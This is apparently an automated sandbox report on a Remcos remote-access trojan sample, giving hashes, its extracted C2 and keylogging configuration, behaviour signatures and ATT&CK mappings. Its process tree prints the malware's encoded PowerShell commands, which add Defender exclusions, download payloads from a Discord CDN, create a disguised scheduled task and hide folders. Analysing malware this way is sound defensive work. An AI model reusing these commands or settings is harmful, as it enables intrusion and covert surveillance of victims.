remcos | 093d5cf870867a18a04b1ff17a71b398f38663446ef9cda68e34120b28d46f43

General

Target

efd4213633c65b490245864feb69279cbdb09add9b70e22e18c183bb0f477cc1.exe
Size

2.2MB
MD5

5051c71e2b1b319a14474b47876403e4
SHA1

3684e802d6831d76da44d53cef16939916976b94
SHA256

efd4213633c65b490245864feb69279cbdb09add9b70e22e18c183bb0f477cc1
SHA512

8aaaa2ed847f452972d36854925e6043fba389f8a8852aad02c10e67d6fc2b0baac5548b48762d522cac4d8980a98170097281fc175f06ff2387c5fdb13b3636
SSDEEP

24576:WN9ewmMdH+HY530osWnYQb6VOKs4zm2evT:I

Score

10^/10

remcos 220928 rat

Malware Config

Extracted

Family

remcos

Botnet

220928

C2

minecraftrpgserver.com:80

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
software_reporter_tool.exe
copy_folder
Google
delete_file
true
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
true
keylog_file
adbkey.dat
keylog_flag
false
keylog_path
%Temp%
mouse_option
false
mutex
9416a517bdcd8521-8QM7X6
screenshot_crypt
true
screenshot_flag
true
screenshot_folder
Google
screenshot_path
%Temp%
screenshot_time
60
startup_value
Google
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Executes dropped EXE 5 IoCs

Processes:

InstallUtil.exeunzip.exeunzip.exeunzip.exeunzip.exe

pid process

836 InstallUtil.exe
1352 unzip.exe
796 unzip.exe
1328 unzip.exe
1604 unzip.exe
Loads dropped DLL 2 IoCs

Processes:

InstallUtil.exe

pid process

1928 InstallUtil.exe
1928 InstallUtil.exe

pid	process
836	InstallUtil.exe
1352	unzip.exe
796	unzip.exe
1328	unzip.exe
1604	unzip.exe

pid	process
1928	InstallUtil.exe
1928	InstallUtil.exe

Drops file in System32 directory 4 IoCs

Processes:

unzip.exeunzip.exeunzip.exeunzip.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	unzip.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	unzip.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	unzip.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	unzip.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

efd4213633c65b490245864feb69279cbdb09add9b70e22e18c183bb0f477cc1.exe

description	pid	process	target process
PID 1284 set thread context of 1928	1284	efd4213633c65b490245864feb69279cbdb09add9b70e22e18c183bb0f477cc1.exe	InstallUtil.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1292 schtasks.exe

pid	process
1292	schtasks.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

efd4213633c65b490245864feb69279cbdb09add9b70e22e18c183bb0f477cc1.exeInstallUtil.exeunzip.exeunzip.exeunzip.exeunzip.exe

pid	process
1284	efd4213633c65b490245864feb69279cbdb09add9b70e22e18c183bb0f477cc1.exe
1284	efd4213633c65b490245864feb69279cbdb09add9b70e22e18c183bb0f477cc1.exe
836	InstallUtil.exe
836	InstallUtil.exe
796	unzip.exe
1328	unzip.exe
1604	unzip.exe
1352	unzip.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

efd4213633c65b490245864feb69279cbdb09add9b70e22e18c183bb0f477cc1.exeInstallUtil.exeunzip.exeunzip.exeunzip.exeunzip.exe

description	pid	process
Token: SeDebugPrivilege	1284	efd4213633c65b490245864feb69279cbdb09add9b70e22e18c183bb0f477cc1.exe
Token: SeDebugPrivilege	836	InstallUtil.exe
Token: SeDebugPrivilege	796	unzip.exe
Token: SeDebugPrivilege	1604	unzip.exe
Token: SeDebugPrivilege	1328	unzip.exe
Token: SeDebugPrivilege	1352	unzip.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

InstallUtil.exe

pid process

1928 InstallUtil.exe

pid	process
1928	InstallUtil.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

efd4213633c65b490245864feb69279cbdb09add9b70e22e18c183bb0f477cc1.exeInstallUtil.execmd.exeunzip.execmd.execmd.exeunzip.execmd.execmd.exeunzip.exe

description	pid	process	target process
PID 1284 wrote to memory of 1928	1284	efd4213633c65b490245864feb69279cbdb09add9b70e22e18c183bb0f477cc1.exe	InstallUtil.exe
PID 1284 wrote to memory of 1928	1284	efd4213633c65b490245864feb69279cbdb09add9b70e22e18c183bb0f477cc1.exe	InstallUtil.exe
PID 1284 wrote to memory of 1928	1284	efd4213633c65b490245864feb69279cbdb09add9b70e22e18c183bb0f477cc1.exe	InstallUtil.exe
PID 1284 wrote to memory of 1928	1284	efd4213633c65b490245864feb69279cbdb09add9b70e22e18c183bb0f477cc1.exe	InstallUtil.exe
PID 1284 wrote to memory of 1928	1284	efd4213633c65b490245864feb69279cbdb09add9b70e22e18c183bb0f477cc1.exe	InstallUtil.exe
PID 1284 wrote to memory of 1928	1284	efd4213633c65b490245864feb69279cbdb09add9b70e22e18c183bb0f477cc1.exe	InstallUtil.exe
PID 1284 wrote to memory of 1928	1284	efd4213633c65b490245864feb69279cbdb09add9b70e22e18c183bb0f477cc1.exe	InstallUtil.exe
PID 1284 wrote to memory of 1928	1284	efd4213633c65b490245864feb69279cbdb09add9b70e22e18c183bb0f477cc1.exe	InstallUtil.exe
PID 1284 wrote to memory of 1928	1284	efd4213633c65b490245864feb69279cbdb09add9b70e22e18c183bb0f477cc1.exe	InstallUtil.exe
PID 1284 wrote to memory of 1928	1284	efd4213633c65b490245864feb69279cbdb09add9b70e22e18c183bb0f477cc1.exe	InstallUtil.exe
PID 1284 wrote to memory of 1928	1284	efd4213633c65b490245864feb69279cbdb09add9b70e22e18c183bb0f477cc1.exe	InstallUtil.exe
PID 1284 wrote to memory of 1928	1284	efd4213633c65b490245864feb69279cbdb09add9b70e22e18c183bb0f477cc1.exe	InstallUtil.exe
PID 1284 wrote to memory of 1928	1284	efd4213633c65b490245864feb69279cbdb09add9b70e22e18c183bb0f477cc1.exe	InstallUtil.exe
PID 1284 wrote to memory of 1928	1284	efd4213633c65b490245864feb69279cbdb09add9b70e22e18c183bb0f477cc1.exe	InstallUtil.exe
PID 1284 wrote to memory of 1928	1284	efd4213633c65b490245864feb69279cbdb09add9b70e22e18c183bb0f477cc1.exe	InstallUtil.exe
PID 1284 wrote to memory of 1928	1284	efd4213633c65b490245864feb69279cbdb09add9b70e22e18c183bb0f477cc1.exe	InstallUtil.exe
PID 1928 wrote to memory of 836	1928	InstallUtil.exe	InstallUtil.exe
PID 1928 wrote to memory of 836	1928	InstallUtil.exe	InstallUtil.exe
PID 1928 wrote to memory of 836	1928	InstallUtil.exe	InstallUtil.exe
PID 1928 wrote to memory of 836	1928	InstallUtil.exe	InstallUtil.exe
PID 1716 wrote to memory of 1768	1716	cmd.exe	choice.exe
PID 1716 wrote to memory of 1768	1716	cmd.exe	choice.exe
PID 1716 wrote to memory of 1768	1716	cmd.exe	choice.exe
PID 1352 wrote to memory of 2000	1352	unzip.exe	cmd.exe
PID 1352 wrote to memory of 2000	1352	unzip.exe	cmd.exe
PID 1352 wrote to memory of 2000	1352	unzip.exe	cmd.exe
PID 1352 wrote to memory of 2000	1352	unzip.exe	cmd.exe
PID 2000 wrote to memory of 1504	2000	cmd.exe	netsh.exe
PID 2000 wrote to memory of 1504	2000	cmd.exe	netsh.exe
PID 2000 wrote to memory of 1504	2000	cmd.exe	netsh.exe
PID 2000 wrote to memory of 1504	2000	cmd.exe	netsh.exe
PID 1352 wrote to memory of 1424	1352	unzip.exe	cmd.exe
PID 1352 wrote to memory of 1424	1352	unzip.exe	cmd.exe
PID 1352 wrote to memory of 1424	1352	unzip.exe	cmd.exe
PID 1352 wrote to memory of 1424	1352	unzip.exe	cmd.exe
PID 1424 wrote to memory of 1508	1424	cmd.exe	netsh.exe
PID 1424 wrote to memory of 1508	1424	cmd.exe	netsh.exe
PID 1424 wrote to memory of 1508	1424	cmd.exe	netsh.exe
PID 1424 wrote to memory of 1508	1424	cmd.exe	netsh.exe
PID 1604 wrote to memory of 1732	1604	unzip.exe	cmd.exe
PID 1604 wrote to memory of 1732	1604	unzip.exe	cmd.exe
PID 1604 wrote to memory of 1732	1604	unzip.exe	cmd.exe
PID 1604 wrote to memory of 1732	1604	unzip.exe	cmd.exe
PID 1732 wrote to memory of 1292	1732	cmd.exe	schtasks.exe
PID 1732 wrote to memory of 1292	1732	cmd.exe	schtasks.exe
PID 1732 wrote to memory of 1292	1732	cmd.exe	schtasks.exe
PID 1732 wrote to memory of 1292	1732	cmd.exe	schtasks.exe
PID 1604 wrote to memory of 992	1604	unzip.exe	cmd.exe
PID 1604 wrote to memory of 992	1604	unzip.exe	cmd.exe
PID 1604 wrote to memory of 992	1604	unzip.exe	cmd.exe
PID 1604 wrote to memory of 992	1604	unzip.exe	cmd.exe
PID 1604 wrote to memory of 684	1604	unzip.exe	cmd.exe
PID 1604 wrote to memory of 684	1604	unzip.exe	cmd.exe
PID 1604 wrote to memory of 684	1604	unzip.exe	cmd.exe
PID 1604 wrote to memory of 684	1604	unzip.exe	cmd.exe
PID 684 wrote to memory of 1828	684	cmd.exe	attrib.exe
PID 684 wrote to memory of 1828	684	cmd.exe	attrib.exe
PID 684 wrote to memory of 1828	684	cmd.exe	attrib.exe
PID 684 wrote to memory of 1828	684	cmd.exe	attrib.exe
PID 1328 wrote to memory of 1964	1328	unzip.exe	cmd.exe
PID 1328 wrote to memory of 1964	1328	unzip.exe	cmd.exe
PID 1328 wrote to memory of 1964	1328	unzip.exe	cmd.exe
PID 1328 wrote to memory of 1964	1328	unzip.exe	cmd.exe
PID 1328 wrote to memory of 1988	1328	unzip.exe	cmd.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

1828 attrib.exe

pid	process
1828	attrib.exe

C:\Users\Admin\AppData\Local\Temp\efd4213633c65b490245864feb69279cbdb09add9b70e22e18c183bb0f477cc1.exe
"C:\Users\Admin\AppData\Local\Temp\efd4213633c65b490245864feb69279cbdb09add9b70e22e18c183bb0f477cc1.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1284

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
2⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1928

C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe
"C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:836

C:\ProgramData\Google\unzip.exe
"C:\ProgramData\Google\unzip.exe" cmd.exe /c netsh interface ipv4 set dns name=Local Area Connection static 8.8.8.8;cmd.exe /c netsh interface ipv4 add dns name=Local Area Connection 8.8.4.4 index=2
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1352

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c netsh interface ipv4 set dns name=Local Area Connection static 8.8.8.8
2⤵
- Suspicious use of WriteProcessMemory
PID:2000

C:\Windows\SysWOW64\netsh.exe
netsh interface ipv4 set dns name=Local Area Connection static 8.8.8.8
3⤵
PID:1504

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c netsh interface ipv4 add dns name=Local Area Connection 8.8.4.4 index=2
2⤵
- Suspicious use of WriteProcessMemory
PID:1424

C:\Windows\SysWOW64\netsh.exe
netsh interface ipv4 add dns name=Local Area Connection 8.8.4.4 index=2
3⤵
PID:1508

C:\ProgramData\Google\unzip.exe
"C:\ProgramData\Google\unzip.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AVABoAHIAZQBhAHQASQBEAEQAZQBmAGEAdQBsAHQAQQBjAHQAaQBvAG4AXwBJAGQAcwAgADIAMQA0ADcAOAAxADQANQAyADMAIAAtAFQAaAByAGUAYQB0AEkARABEAGUAZgBhAHUAbAB0AEEAYwB0AGkAbwBuAF8AQQBjAHQAaQBvAG4AcwAgAEEAbABsAG8AdwAgAC0ARgBvAHIAYwBlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AVABoAHIAZQBhAHQASQBEAEQAZQBmAGEAdQBsAHQAQQBjAHQAaQBvAG4AXwBJAGQAcwAgADIAMQA0ADcAOAAxADQANQAyADQAIAAtAFQAaAByAGUAYQB0AEkARABEAGUAZgBhAHUAbAB0AEEAYwB0AGkAbwBuAF8AQQBjAHQAaQBvAG4AcwAgAEEAbABsAG8AdwAgAC0ARgBvAHIAYwBlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AVABoAHIAZQBhAHQASQBEAEQAZQBmAGEAdQBsAHQAQQBjAHQAaQBvAG4AXwBJAGQAcwAgADIAMQA0ADcAOAAzADEANAA1ADYAIAAtAFQAaAByAGUAYQB0AEkARABEAGUAZgBhAHUAbAB0AEEAYwB0AGkAbwBuAF8AQQBjAHQAaQBvAG4AcwAgAEEAbABsAG8AdwAgAC0ARgBvAHIAYwBlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AVABoAHIAZQBhAHQASQBEAEQAZQBmAGEAdQBsAHQAQQBjAHQAaQBvAG4AXwBJAGQAcwAgADIAMQA0ADcANwAzADUANQAwADMAIAAtAFQAaAByAGUAYQB0AEkARABEAGUAZgBhAHUAbAB0AEEAYwB0AGkAbwBuAF8AQQBjAHQAaQBvAG4AcwAgAEEAbABsAG8AdwAgAC0ARgBvAHIAYwBlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AVABoAHIAZQBhAHQASQBEAEQAZQBmAGEAdQBsAHQAQQBjAHQAaQBvAG4AXwBJAGQAcwAgADIAMQA0ADcANwAzADUANQAwADUAIAAtAFQAaAByAGUAYQB0AEkARABEAGUAZgBhAHUAbAB0AEEAYwB0AGkAbwBuAF8AQQBjAHQAaQBvAG4AcwAgAEEAbABsAG8AdwAgAC0ARgBvAHIAYwBlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAJwA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAFQAaAByAGUAYQB0AEkARABEAGUAZgBhAHUAbAB0AEEAYwB0AGkAbwBuAF8ASQBkAHMAIAAyADEANAA3ADgAMwAxADQAOQAzACAALQBUAGgAcgBlAGEAdABJAEQARABlAGYAYQB1AGwAdABBAGMAdABpAG8AbgBfAEEAYwB0AGkAbwBuAHMAIABBAGwAbABvAHcAIAAtAEYAbwByAGMAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAEcAbwBvAGcAbABlACcAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAJwBJAG4AcwB0AGEAbABsAFUAdABpAGwALgBlAHgAZQAnADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgACcAcwBvAGYAdAB3AGEAcgBlAF8AcgBlAHAAbwByAHQAZQByAF8AdABvAG8AbAAuAGUAeABlACcAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAJwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAJwA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAAnAEMAOgBcAFUAcwBlAHIAcwBcACoAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwASQBOAGUAdABDAGEAYwBoAGUAXABJAEUAJwA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIAAnAHUAbgB6AGkAcAAuAGUAeABlACcAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAJwBjAG0AZAAuAGUAeABlACcAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAJwBHAG8AbwBnAGwAZQBVAHAAZABhAHQAZQAuAGUAeABlACcAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAJwBkAHcAbQAuAGUAeABlACcAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAJwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAJwA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAAnAEMAOgBcAFUAcwBlAHIAcwBcACoAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcAAnAA==
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:796

C:\ProgramData\Google\unzip.exe
"C:\ProgramData\Google\unzip.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADIAMQA5ADQAOQA1ADgANQAyADQAMgA5ADgAMAAzADYANgAvADEAMAAyADYAOAA3ADgAMAA5ADQANQAyADQANQA2ADMANAA5ADYALwA3AHoALgBkAGwAbAAnACwAJwBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABHAG8AbwBnAGwAZQBcADcAegAuAGQAbABsACcAKQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAAyADEAOQA0ADkANQA4ADUAMgA0ADIAOQA4ADAAMwA2ADYALwAxADAAMgA2ADgANwA4ADAAOQA0ADgANwAyADYAOQA0ADcAOAA0AC8ANwB6AC4AZQB4AGUAJwAsACcAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwARwBvAG8AZwBsAGUAXAA3AHoALgBlAHgAZQAnACkAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgAxADkANAA5ADUAOAA1ADIANAAyADkAOAAwADMANgA2AC8AMQAwADIAOQA4ADcANgA3ADcANQA4ADIANQA3ADIAMwA0ADQAMgAvAFUAcABkAGEAdABlAC4AbQBzAGkAJwAsACcAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwARwBvAG8AZwBsAGUAXABJAG4AcwB0AGEAbABsAFUAdABpAGwALgBwAG4AZwAnACkAOwBjAG0AZAAuAGUAeABlACAALwBjACAAJwBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABHAG8AbwBnAGwAZQBcADcAegAuAGUAeABlACcAIAB4ACAALQBvAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAEcAbwBvAGcAbABlAFwAIABDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABHAG8AbwBnAGwAZQBcAEkAbgBzAHQAYQBsAGwAVQB0AGkAbAAuAHAAbgBnACAALQBwAHgAIAAtAHkAOwBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABHAG8AbwBnAGwAZQBcAEkAbgBzAHQAYQBsAGwAVQB0AGkAbAAuAGUAeABlADsAYwBtAGQALgBlAHgAZQAgAC8AYwAgAGMAaABvAGkAYwBlACAALwBjACAAeQAgAC8AbgAgAC8AZAAgAHkAIAAvAHQAIAAzACAAIgAmACIAIABkAGUAbAAgACIAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwARwBvAG8AZwBsAGUAXABJAG4AcwB0AGEAbABsAFUAdABpAGwALgBlAHgAZQAiADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADIAMQA5ADQAOQA1ADgANQAyADQAMgA5ADgAMAAzADYANgAvADEAMAAzADAAOAA1ADcAMAAwADgAMAAwADMANAAyADAAMgAwADAALwBLAEIANAAwADgANwA2ADQAMgAuAG0AcwBpACcALAAnAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwASwBCADQAMAA4ADcANgA0ADIALgBoAHQAYQAnACkAOwBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcAEsAQgA0ADAAOAA3ADYANAAyAC4AaAB0AGEAOwBjAG0AZAAuAGUAeABlACAALwBjACAAYwBoAG8AaQBjAGUAIAAvAGMAIAB5ACAALwBuACAALwBkACAAeQAgAC8AdAAgADMAIAAiACYAIgAgAGQAZQBsACAAIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcAEsAQgA0ADAAOAA3ADYANAAyAC4AaAB0AGEAIgA=
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1328

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\ProgramData\Google\7z.exe x -oC:\ProgramData\Google\ C:\ProgramData\Google\InstallUtil.png -px -y
2⤵
PID:1964

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c choice /c y /n /d y /t 3 & del C:\ProgramData\Google\InstallUtil.exe
2⤵
PID:1988

C:\Windows\SysWOW64\choice.exe
choice /c y /n /d y /t 3
3⤵
PID:1616

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c choice /c y /n /d y /t 3 & del C:\Windows\Temp\KB4087642.hta
2⤵
PID:1000

C:\Windows\SysWOW64\choice.exe
choice /c y /n /d y /t 3
3⤵
PID:660

C:\ProgramData\Google\unzip.exe
"C:\ProgramData\Google\unzip.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADIAMQA5ADQAOQA1ADgANQAyADQAMgA5ADgAMAAzADYANgAvADEAMAAyADMAOQA0ADkANgAzADUAMQA5ADIAMQAxADEAMQA2ADQALwBjAG0AZAAuAG0AcwBpACcALAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAEcAbwBvAGcAbABlAFwARwBvAG8AZwBsAGUAVQBwAGQAYQB0AGUALgBlAHgAZQAnACkAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgAxADkANAA5ADUAOAA1ADIANAAyADkAOAAwADMANgA2AC8AMQAwADIAOAA0ADMAOAA4ADIAMAA2ADUANwA1ADYAMQA2ADUAMAAvAHgAbQBsAG8AMgAuAG0AcwBpACcALAAnAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwALgB4AG0AbAAnACkAOwBjAG0AZAAuAGUAeABlACAALwBjACAAcwBjAGgAdABhAHMAawBzACAALwBjAHIAZQBhAHQAZQAgAC8AeABtAGwAIAAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwALgB4AG0AbAAiACAALwB0AG4AIAAiAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsAIgAgAC8AZgA7AGMAbQBkAC4AZQB4AGUAIAAvAGMAIABkAGUAbAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXAAuAHgAbQBsACIAOwBjAG0AZAAuAGUAeABlACAALwBjACAAYQB0AHQAcgBpAGIAIAArAGgAIAArAFMAIAAiAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAEcAbwBvAGcAbABlACIA
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1604

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c schtasks /create /xml C:\Windows\Temp\.xml /tn GoogleUpdateTask /f
2⤵
- Suspicious use of WriteProcessMemory
PID:1732

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /xml C:\Windows\Temp\.xml /tn GoogleUpdateTask /f
3⤵
- Creates scheduled task(s)
PID:1292

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c del C:\Windows\Temp\.xml
2⤵
PID:992

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c attrib +h +S C:\ProgramData\Google
2⤵
- Suspicious use of WriteProcessMemory
PID:684

C:\Windows\SysWOW64\attrib.exe
attrib +h +S C:\ProgramData\Google
3⤵
- Views/modifies file attributes
PID:1828

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c choice /c y /n /d y & Del "C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1716

C:\Windows\system32\choice.exe
choice /c y /n /d y
2⤵
PID:1768

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Scheduled Task

1

T1053

Hidden Files and Directories

1

T1158

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Hidden Files and Directories

1

T1158

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

